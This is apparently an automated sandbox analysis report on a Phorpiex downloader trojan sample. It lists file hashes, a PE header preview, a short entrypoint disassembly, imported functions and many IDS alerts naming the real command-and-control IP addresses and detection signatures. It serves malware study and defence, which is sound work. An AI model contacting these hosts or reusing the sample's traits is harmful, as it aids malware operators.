                                            • Filename: SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L....|if.............................u............@..........................................................................*.......................................................................................... ............................text............................... ..`.rdata..b:.......<..................@..@.data....G...@...6...*..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.352081778201283
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:file.exe
                                            File size:90'112 bytes
                                            MD5:ababca6d12d96e8dd2f1d7114b406fae
                                            SHA1:dcd9798e83ec688aacb3de8911492a232cb41a32
                                            SHA256:a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba
                                            SHA512:b7fc70c176bdc74cf68b14e694f3e53142e64d39bd6d3e0f2e3a74ce3178ea606f92f760d21db69d72ae6677545a47c7bf390fb65cd5247a48e239f6ae8f7b8f
                                            SSDEEP:1536:wL0IGzbFmav82XwudP6+0MTqEjXm/D5AKHK:c0poOfP6+JuEjaaKHK
                                            TLSH:64931A42F590A47FF9EA86FA91F64E68542CBFB4234844E39250659B87207FEFC35027
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.qj)..9)..9)..9 ..9...9Q..8+..9..B9+..9..@9(..9...9+..9..r9-..9)..9...9..d9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9...............

                                            File Icon

                                            Icon Hash:90cececece8e8eb0

                                            Static PE Info

                                            General

                                            Entrypoint:0x407500
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66697CAF [Wed Jun 12 10:47:11 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:2e23372b9869b74c90162a6fda4f170d

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000FF0h
                                            push 000007D0h
                                            call dword ptr [0041013Ch]
                                            push 0041431Ch
                                            push 00000000h
                                            push 00000000h
                                            call dword ptr [00410098h]
                                            mov dword ptr [ebp-00000E5Ch], eax
                                            call dword ptr [0041009Ch]
                                            cmp eax, 000000B7h
                                            jne 00007F3DCD20D74Ah
                                            push 00000000h
                                            call dword ptr [004100A0h]
                                            mov dword ptr [ebp-0000062Ch], 00000000h
                                            mov dword ptr [ebp-0000041Ch], 00000000h
                                            mov dword ptr [ebp-0000083Ch], 00000001h
                                            mov dword ptr [ebp-00000210h], 00000004h
                                            push 00000105h
                                            push 00417B18h
                                            push 00000000h
                                            call dword ptr [004100B0h]
                                            push 00417B18h
                                            call dword ptr [0041017Ch]
                                            mov dword ptr [ebp-0000020Ch], eax
                                            push 00417B18h
                                            push 004112DCh
                                            lea eax, dword ptr [ebp-00000208h]
                                            push eax
                                            call dword ptr [0041019Ch]
                                            add esp, 0Ch
                                            lea ecx, dword ptr [ebp-00000208h]
                                            push ecx
                                            call dword ptr [004100C0h]
                                            push 00000104h
                                            lea edx, dword ptr [ebp-00000E58h]
                                            push edx
                                            push 00411304h
                                            call dword ptr [004100A4h]

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2005 build 50727
                                            • [IMP] VS2005 build 50727
                                            • [ C ] VS2008 SP1 build 30729
                                            • [C++] VS2008 SP1 build 30729
                                            • [LNK] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x12a940x104.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x100000x320.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xe8aa0xea00de57a23428cadf6f1aed6b6601be700aFalse0.4650106837606838data6.114014927367993IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x100000x3a620x3c00a61ba0e131cbec528ddecb1edc07279eFalse0.4317708333333333data5.405015238701291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x140000x47d80x3600c04ca37b6d5b2a25385e3343eab0a917False0.21412037037037038data4.536418070021025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                            Imports

                                            DLLImport
                                            WS2_32.dllgethostname, recvfrom, setsockopt, closesocket, htons, shutdown, WSAStartup, connect, WSAWaitForMultipleEvents, listen, WSASocketA, WSACreateEvent, WSAGetOverlappedResult, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError, WSASend, WSARecv, WSACloseEvent, accept, getpeername, getsockname, inet_addr, gethostbyname, inet_ntoa, socket, bind, sendto, ioctlsocket, recv, send
                                            SHLWAPI.dllStrStrIA, StrCmpNW, StrStrW, PathFileExistsW, StrChrA, PathFindFileNameW, StrCmpNIA, PathMatchSpecW
                                            urlmon.dllURLDownloadToFileW
                                            WININET.dllHttpOpenRequestA, HttpSendRequestA, InternetConnectA, InternetCloseHandle, DeleteUrlCacheEntry, InternetReadFile, InternetOpenA, InternetCrackUrlA, HttpAddRequestHeadersA, HttpQueryInfoA, InternetOpenUrlA, DeleteUrlCacheEntryW, InternetOpenUrlW, InternetOpenW
                                            ntdll.dllstrlen, isdigit, isalpha, memcpy, memset, NtQueryVirtualMemory, RtlUnwind, _chkstk, _aulldiv, wcslen, wcscmp, _allshl, _aullshr, strstr, strcmp, memmove, memcmp, RtlTimeToSecondsSince1980, NtQuerySystemTime, mbstowcs
                                            msvcrt.dllsrand, rand, _vscprintf
                                            KERNEL32.dllGetQueuedCompletionStatus, PostQueuedCompletionStatus, GetSystemInfo, lstrcmpW, SetEvent, CreateProcessW, GetLocaleInfoA, DeleteCriticalSection, GetCurrentThread, GetThreadPriority, SetThreadPriority, GetCurrentProcess, DuplicateHandle, IsBadReadPtr, InterlockedExchangeAdd, InterlockedIncrement, WaitForSingleObject, InterlockedDecrement, InterlockedExchange, HeapFree, HeapValidate, HeapReAlloc, GetProcessHeaps, HeapCreate, HeapSetInformation, GetCurrentProcessId, HeapAlloc, CreateMutexA, GetLastError, ExitProcess, ExpandEnvironmentStringsW, CreateEventA, CreateThread, GetModuleFileNameW, GetVolumeInformationW, GetDiskFreeSpaceExW, SetFileAttributesW, DeleteFileW, CopyFileW, lstrcmpiW, CreateDirectoryW, FindFirstFileW, CreateIoCompletionPort, MoveFileExW, FindNextFileW, FindClose, RemoveDirectoryW, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, lstrcpyW, WriteFile, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, CreateFileW, CreateFileMappingW, MapViewOfFile, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, lstrlenW, lstrcpynW, MultiByteToWideChar, ExitThread, GetTickCount, Sleep, GetModuleHandleW, CloseHandle, UnmapViewOfFile, GetFileSize
                                            USER32.dllRegisterClassExW, CreateWindowExW, GetMessageA, TranslateMessage, wsprintfW, DefWindowProcA, ChangeClipboardChain, RegisterRawInputDevices, GetClipboardData, DispatchMessageA, EmptyClipboard, SetClipboardData, CloseClipboard, IsClipboardFormatAvailable, SendMessageA, SetWindowLongW, SetClipboardViewer, GetWindowLongW, wsprintfA, wvsprintfA, OpenClipboard
                                            ADVAPI32.dllCryptReleaseContext, RegQueryValueExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExW, CryptAcquireContextW, CryptGenRandom, RegCloseKey, RegSetValueExW, RegSetValueExA
                                            SHELL32.dllShellExecuteW
                                            ole32.dllCoInitializeEx, CoUninitialize, CoInitialize, CoCreateInstance
                                            OLEAUT32.dllSysFreeString, SysAllocString

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-09-17T23:09:15.563777+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.449793TCP
                                            2024-09-17T23:09:16.259431+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730185.215.113.6680TCP
                                            2024-09-17T23:09:16.259431+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449730185.215.113.6680TCP
                                            2024-09-17T23:09:17.984779+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732185.215.113.6680TCP
                                            2024-09-17T23:09:17.984779+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449732185.215.113.6680TCP
                                            2024-09-17T23:09:18.095591+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914584.54.122.1440500UDP
                                            2024-09-17T23:09:23.161855+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145178.151.4.20940500UDP
                                            2024-09-17T23:09:23.386341+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:23.386341+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:25.665035+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:25.665035+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:27.916077+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:27.916077+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:30.163885+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:30.163885+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:32.414765+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:32.414765+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449734185.215.113.6680TCP
                                            2024-09-17T23:09:33.235648+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4591452.189.25.17640500UDP
                                            2024-09-17T23:09:37.130578+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973877.91.77.9280TCP
                                            2024-09-17T23:09:37.130578+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44973877.91.77.9280TCP
                                            2024-09-17T23:09:38.241849+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914586.102.56.22640500UDP
                                            2024-09-17T23:09:40.900663+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974177.91.77.9280TCP
                                            2024-09-17T23:09:40.900663+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974177.91.77.9280TCP
                                            2024-09-17T23:09:43.241812+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4591452.190.124.2340500UDP
                                            2024-09-17T23:09:44.587314+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974377.91.77.9280TCP
                                            2024-09-17T23:09:44.587314+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974377.91.77.9280TCP
                                            2024-09-17T23:09:48.275269+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974477.91.77.9280TCP
                                            2024-09-17T23:09:48.275269+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974477.91.77.9280TCP
                                            2024-09-17T23:09:52.012408+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974577.91.77.9280TCP
                                            2024-09-17T23:09:52.012408+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974577.91.77.9280TCP
                                            2024-09-17T23:09:55.742140+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974677.91.77.9280TCP
                                            2024-09-17T23:09:55.742140+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974677.91.77.9280TCP
                                            2024-09-17T23:09:58.255064+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145105.106.52.9740500UDP
                                            2024-09-17T23:09:59.523347+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974891.202.233.14180TCP
                                            2024-09-17T23:09:59.523347+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974891.202.233.14180TCP
                                            2024-09-17T23:10:01.236543+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974991.202.233.14180TCP
                                            2024-09-17T23:10:01.236543+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974991.202.233.14180TCP
                                            2024-09-17T23:10:03.308803+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145217.30.170.1040500UDP
                                            2024-09-17T23:10:07.663501+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44974991.202.233.14180TCP
                                            2024-09-17T23:10:07.663501+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44974991.202.233.14180TCP
                                            2024-09-17T23:10:08.302854+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145217.30.162.3740500UDP
                                            2024-09-17T23:10:10.219426+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:10.219426+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:13.319220+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914581.195.238.13040500UDP
                                            2024-09-17T23:10:16.643936+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975291.202.233.14180TCP
                                            2024-09-17T23:10:16.846309+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:16.846309+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:19.905577+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:19.905577+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975191.202.233.14180TCP
                                            2024-09-17T23:10:22.671072+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975491.202.233.14180TCP
                                            2024-09-17T23:10:22.671072+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975491.202.233.14180TCP
                                            2024-09-17T23:10:23.335541+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914546.100.121.14640500UDP
                                            2024-09-17T23:10:25.439810+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44975691.202.233.14180TCP
                                            2024-09-17T23:10:25.439810+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44975691.202.233.14180TCP
                                            2024-09-17T23:10:28.348342+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914537.255.23.10040500UDP
                                            2024-09-17T23:10:29.317891+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449758185.215.113.6680TCP
                                            2024-09-17T23:10:29.317891+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449758185.215.113.6680TCP
                                            2024-09-17T23:10:31.032415+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449759185.215.113.6680TCP
                                            2024-09-17T23:10:31.032415+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449759185.215.113.6680TCP
                                            2024-09-17T23:10:37.676890+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449762185.215.113.6680TCP
                                            2024-09-17T23:10:37.676890+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449762185.215.113.6680TCP
                                            2024-09-17T23:10:38.364094+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145178.253.109.19540500UDP
                                            2024-09-17T23:10:40.456563+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449764185.215.113.6680TCP
                                            2024-09-17T23:10:40.456563+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449764185.215.113.6680TCP
                                            2024-09-17T23:10:43.194117+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449766185.215.113.6680TCP
                                            2024-09-17T23:10:43.194117+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449766185.215.113.6680TCP
                                            2024-09-17T23:10:43.380318+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4591455.236.253.12440500UDP
                                            2024-09-17T23:10:46.044400+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449767185.215.113.6680TCP
                                            2024-09-17T23:10:46.044400+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449767185.215.113.6680TCP
                                            2024-09-17T23:10:48.397244+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145213.230.127.21340500UDP
                                            2024-09-17T23:10:48.784910+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449769185.215.113.6680TCP
                                            2024-09-17T23:10:48.784910+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449769185.215.113.6680TCP
                                            2024-09-17T23:10:53.491643+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977077.91.77.9280TCP
                                            2024-09-17T23:10:53.491643+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977077.91.77.9280TCP
                                            2024-09-17T23:10:57.334445+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977277.91.77.9280TCP
                                            2024-09-17T23:10:57.334445+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977277.91.77.9280TCP
                                            2024-09-17T23:10:58.514941+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914589.43.145.1840500UDP
                                            2024-09-17T23:11:01.041077+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977477.91.77.9280TCP
                                            2024-09-17T23:11:01.041077+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977477.91.77.9280TCP
                                            2024-09-17T23:11:03.520358+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914579.165.23.13140500UDP
                                            2024-09-17T23:11:04.737217+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977677.91.77.9280TCP
                                            2024-09-17T23:11:04.737217+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977677.91.77.9280TCP
                                            2024-09-17T23:11:08.444057+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977777.91.77.9280TCP
                                            2024-09-17T23:11:08.444057+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977777.91.77.9280TCP
                                            2024-09-17T23:11:12.115917+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44977977.91.77.9280TCP
                                            2024-09-17T23:11:12.115917+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44977977.91.77.9280TCP
                                            2024-09-17T23:11:13.541304+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145151.240.79.13340500UDP
                                            2024-09-17T23:11:16.142994+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978191.202.233.14180TCP
                                            2024-09-17T23:11:16.142994+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978191.202.233.14180TCP
                                            2024-09-17T23:11:17.859805+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978291.202.233.14180TCP
                                            2024-09-17T23:11:17.859805+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978291.202.233.14180TCP
                                            2024-09-17T23:11:23.570592+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145178.88.111.2040500UDP
                                            2024-09-17T23:11:24.665171+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978591.202.233.14180TCP
                                            2024-09-17T23:11:24.665171+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978591.202.233.14180TCP
                                            2024-09-17T23:11:27.404856+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978691.202.233.14180TCP
                                            2024-09-17T23:11:27.404856+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978691.202.233.14180TCP
                                            2024-09-17T23:11:30.236762+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978891.202.233.14180TCP
                                            2024-09-17T23:11:30.236762+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978891.202.233.14180TCP
                                            2024-09-17T23:11:33.050771+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44978991.202.233.14180TCP
                                            2024-09-17T23:11:33.050771+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44978991.202.233.14180TCP
                                            2024-09-17T23:11:35.900980+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44979191.202.233.14180TCP
                                            2024-09-17T23:11:35.900980+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44979191.202.233.14180TCP
                                            2024-09-17T23:11:39.986361+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449793185.215.113.6680TCP
                                            2024-09-17T23:11:39.986361+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449793185.215.113.6680TCP
                                            2024-09-17T23:11:41.832654+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449794185.215.113.6680TCP
                                            2024-09-17T23:11:41.832654+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449794185.215.113.6680TCP
                                            2024-09-17T23:11:43.982652+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.449794TCP
                                            2024-09-17T23:11:46.807316+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.449796TCP
                                            2024-09-17T23:11:47.503983+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449797185.215.113.6680TCP
                                            2024-09-17T23:11:47.503983+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449797185.215.113.6680TCP
                                            2024-09-17T23:11:50.288976+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449799185.215.113.6680TCP
                                            2024-09-17T23:11:50.288976+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449799185.215.113.6680TCP
                                            2024-09-17T23:11:53.080321+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449800185.215.113.6680TCP
                                            2024-09-17T23:11:53.080321+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449800185.215.113.6680TCP
                                            2024-09-17T23:11:55.821523+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449802185.215.113.6680TCP
                                            2024-09-17T23:11:55.821523+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449802185.215.113.6680TCP
                                            2024-09-17T23:11:58.781922+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449803185.215.113.6680TCP
                                            2024-09-17T23:11:58.781922+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449803185.215.113.6680TCP
                                            2024-09-17T23:12:03.475094+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44980577.91.77.9280TCP
                                            2024-09-17T23:12:03.475094+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44980577.91.77.9280TCP
                                            2024-09-17T23:12:07.188452+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44980777.91.77.9280TCP
                                            2024-09-17T23:12:07.188452+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44980777.91.77.9280TCP
                                            2024-09-17T23:12:10.900881+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44980977.91.77.9280TCP
                                            2024-09-17T23:12:10.900881+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44980977.91.77.9280TCP
                                            2024-09-17T23:12:14.779580+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981077.91.77.9280TCP
                                            2024-09-17T23:12:14.779580+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981077.91.77.9280TCP
                                            2024-09-17T23:12:18.495368+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981277.91.77.9280TCP
                                            2024-09-17T23:12:18.495368+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981277.91.77.9280TCP
                                            2024-09-17T23:12:18.707808+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4591452.185.144.15740500UDP
                                            2024-09-17T23:12:22.405916+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981477.91.77.9280TCP
                                            2024-09-17T23:12:22.405916+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981477.91.77.9280TCP
                                            2024-09-17T23:12:23.724097+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914578.39.225.2740500UDP
                                            2024-09-17T23:12:26.510035+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981691.202.233.14180TCP
                                            2024-09-17T23:12:26.510035+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981691.202.233.14180TCP
                                            2024-09-17T23:12:28.739574+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914537.228.65.18540500UDP
                                            2024-09-17T23:12:28.823664+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981791.202.233.14180TCP
                                            2024-09-17T23:12:28.823664+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981791.202.233.14180TCP
                                            2024-09-17T23:12:35.986822+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982091.202.233.14180TCP
                                            2024-09-17T23:12:35.986822+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982091.202.233.14180TCP
                                            2024-09-17T23:12:38.729098+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982191.202.233.14180TCP
